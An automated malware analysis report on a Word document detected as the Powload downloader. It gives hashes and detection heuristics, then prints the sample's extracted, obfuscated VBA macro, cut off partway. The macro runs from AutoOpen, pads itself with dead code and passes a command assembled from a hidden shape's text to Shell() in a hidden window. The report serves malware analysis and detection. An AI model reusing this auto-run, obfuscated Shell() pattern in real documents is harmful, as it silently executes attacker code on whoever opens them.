Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 056dc881e434af5f…

MALICIOUS

Office (OLE)

82.8 KB Created: 2018-11-21 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 43ac97e7f83ee41561f9f18828007078 SHA-1: 199d46a2aee59dd05db9cb666507b277fddad85d SHA-256: 056dc881e434af5fb3bfabd4eebbf630e4c8a8e166467fa310a78bc8745b6209
202 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.Powload-6769663-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6769663-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The extracted module calls `Interaction.Shell(..., vbHide)` from within `AutoOpen`, so a command line is executed in a hidden window as soon as the macro runs. The command string is not a literal: it is concatenated at runtime from undeclared variables and from the text of a drawing shape (`Shapes("ZIVVFHRwMZpCBj").TextFrame.TextRange.Text`), so the static listing does not show the actual command. Recover it by dumping that shape's text from the document, or by instrumenting/emulating the macro. The surrounding `If ... Xor ...` blocks and large arithmetic expressions do not feed the Shell() argument and look like dead-code padding (verify during emulation).
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The extracted module defines `Sub AutoOpen()`, which Word runs automatically when the document is opened and macros are enabled. In this sample it is the procedure that builds the command string and issues the hidden Shell() call, so no further user interaction is needed once macros are allowed.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. In general this heuristic is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself, and on its own would fire when no modern VBA project was recovered and no stronger macro-virus family marker was present. Note that for this sample a VBA project was recovered (see OLE_VBA_MACROS and the extracted macros.bas), and the marker corresponds to the `Sub AutoOpen()` in that module, so this finding is redundant with OLE_VBA_AUTOOPEN rather than independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This URL is the standard OOXML DrawingML XML namespace identifier, which is present in any Word document that embeds a drawing object (consistent with the Shapes(...) reference in the macro). It is not contacted at runtime and should not be treated as a network indicator; the real download/command destination, if any, is inside the runtime-built Shell() command and is not visible statically.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4383 bytes
SHA-256: 2c649dd65637564e618b7e4b745ce711f928bcad16a7a70097df86859cb2dcd9
Preview script
First 1,000 lines of the extracted script
' Module attributes as exported by oletools olevba (decoded VBA source, see
' "Extracted artifacts"); comments below are analyst annotations, not part of the
' original macro text.
' Module name is a random-looking string, in the same style as the identifiers
' used throughout the macro body (looks generated; no semantic meaning found).
Attribute VB_Name = "BjKczdkSBL"
' NOTE(review): "1Normal.ThisDocument" presumably marks this as the document's
' ThisDocument class module derived from the Normal template — confirm against
' the vbaProject/dir stream rather than relying on the attribute alone.
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
' A predeclared default instance exists, as is usual for document class modules;
' the AutoOpen procedure that follows lives in this module.
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If fJTonDo Xor VRvZRmoj Then
         risuZdJ = jtCjd
      End If
      If wwVLZpR Xor KZpwcDJ Then
         WklzLIMj = Sgn(jKjEK)
      End If
   GsuzbvbO = (HPYSEcBFv - CDbl(336433771) / RuiLnlp + Sgn(34030430)) - 301209091 + CInt(iXAniEh) - 24534967 * Fix(225228903 * Oct(vWurwktb))
Set iEnFnVL = jMqGWV
   On Error Resume Next
      If isMFmj Xor sXpARD Then
         IoCOB = wVwFhJu
      End If
      If bPjDlzV Xor JaSLlWtj Then
         ZSFENR = Sgn(TCRNwG)
      End If
   cmjRIGw = (EoTibwpp - CDbl(186177256) / MtHqoZN + Sgn(325733163)) - 118483862 + CInt(jhIrCCpZ) - 32203787 * Fix(33344031 * Oct(cPtNQkip))
Set dMpkjNQ = zGDKoMwX
Set rYfVYTB = Shapes("ZIVVFHRwMZpCBj")
   On Error Resume Next
      If liYLN Xor jVKVbBuTU Then
         rdHYEX = XAsLNi
      End If
      If sqfuvnfz Xor HUpsF Then
         KfsHJS = Sgn(lVCOLAL)
      End If
   nVrcclV = (XhfrcADOf - CDbl(89614004) / qMTGV + Sgn(102205249)) - 151662132 + CInt(Jshbi) - 268777030 * Fix(206129052 * Oct(zwPdho))
Set UZdatkSn = zwUITPWN
zpsRikk = "" + EQQjWBj + GpFAC + rodUrFw + TWAjbBY + rYfVYTB.TextFrame.TextRange.Text + SNZTcU + afUdYwE + YbMUAqb + afUoOLV
   On Error Resume Next
      If dAbujR Xor FvurKUzi Then
         FwDpzhE = jtLzjds
      End If
      If HLPhnO Xor FlkjiPQ Then
         Qborv = Sgn(pSvwELqFl)
      End If
   RCYCIhA = (qYwDPBVG - CDbl(124100111) / vWumzTSt + Sgn(130906140)) - 245119460 + CInt(DhzAOOjq) - 92116639 * Fix(341948050 * Oct(azAWAlCu))
Set wsFKPaf = FkONP
   On Error Resume Next
      If rmOjPj Xor UCbMpjAd Then
         EEXfif = DrRHdj
      End If
      If Hpbaq Xor nXfpVB Then
         hhIHRj = Sgn(FdISoLRLp)
      End If
   YBnBTWNIJ = (ZjYiKd - CDbl(111866459) / VjJqzivd + Sgn(217484344)) - 55732193 + CInt(izciiRTO) - 87819925 * Fix(85922656 * Oct(uzITYZ))
Set aILud = FoiEEFqpF
rwDAmpPE = Interaction.Shell("" + ZKkLbpln + vvmaS + ldlVLsN + iCHli + zpsRikk + wTfsim + oEWbPJ, vbHide)
   On Error Resume Next
      If jEhRjr Xor AdbGRoRul Then
         iJzSsDzf = rMCnsi
      End If
      If GMnjSdM Xor joUnRwj Then
         aWZzjw = Sgn(AjlUAjwq)
      End If
   cohFGCVE = (ZjDjKOPKz - CDbl(182941581) / TjtKXn + Sgn(339889773)) - 221779233 + CInt(Lrkwl) - 73922765 * Fix(192434588 * Oct(aIYAUA))
Set MlRYW = qlWZP
   On Error Resume Next
      If DHRAFM Xor fBmJij Then
         fXiAMBwM = jjjWNdUi
      End If
      If aCiIbP Xor rGYKhwDv Then
         EwXiKiVr = Sgn(iRYpDB)
      End If
   HwEdEWvS = (UuZBFk - CDbl(209806006) / qJiwvAvh + Sgn(284725128)) - 261091726 + CInt(wKCDWcaAw) - 119976599 * Fix(181664453 * Oct(CFSpkvpP))
Set loztXlLwJ = NjCTFSqDY
   On Error Resume Next
      If vEmocBw Xor NJEnM Then
         OauYiuC = QHlRSHdN
      End If
      If zjYqdqb Xor WPUPjYjq Then
         fTXbsPbOo = Sgn(CKirdzk)
      End If
   Eolkk = (pMfiRj - CDbl(227835387) / abcKp + Sgn(326346079)) - 40667946 + CInt(zboLZX) - 265342320 * Fix(156746638 * Oct(PwScCFuiE))
Set jjswHwzk = PTKnz
   On Error Resume Next
      If aTrNObru Xor DzUZRNBuw Then
         vcpBowFP = kDzQkT
      End If
      If JXdDjo Xor bOoSBhw Then
         CRYZLk = Sgn(DQIMXK)
      End If
   GhjGADdQt = (HENnz - CDbl(203656518) / iXZAj + Sgn(292750065)) - 71562211 + CInt(frUNu) - 131781294 * Fix(112801057 * Oct(jHHivj))
Set hlXUSHXiD = EiAlraoZ
   On Error Resume Next
      If AmfOJRi Xor zUzWwlMbi Then
         asRHEk = iIbwa
      End If
      If fjtqZQkA Xor pScfwCkiA Then
         wazjI = Sgn(iuGbJCrYo)
      End If
   mCumKw = (jCwfYn - CDbl(38620001) / ZbqbFfAkz + Sgn(283780060)) - 140828772 + CInt(ZknbDri) - 102014267 * Fix(220129284 * Oct(NzAKThKO))
Set HAcjb = zjmmS
   On Error Resume Next
      If GzTIQ Xor Kavwbc Then
        
... (truncated)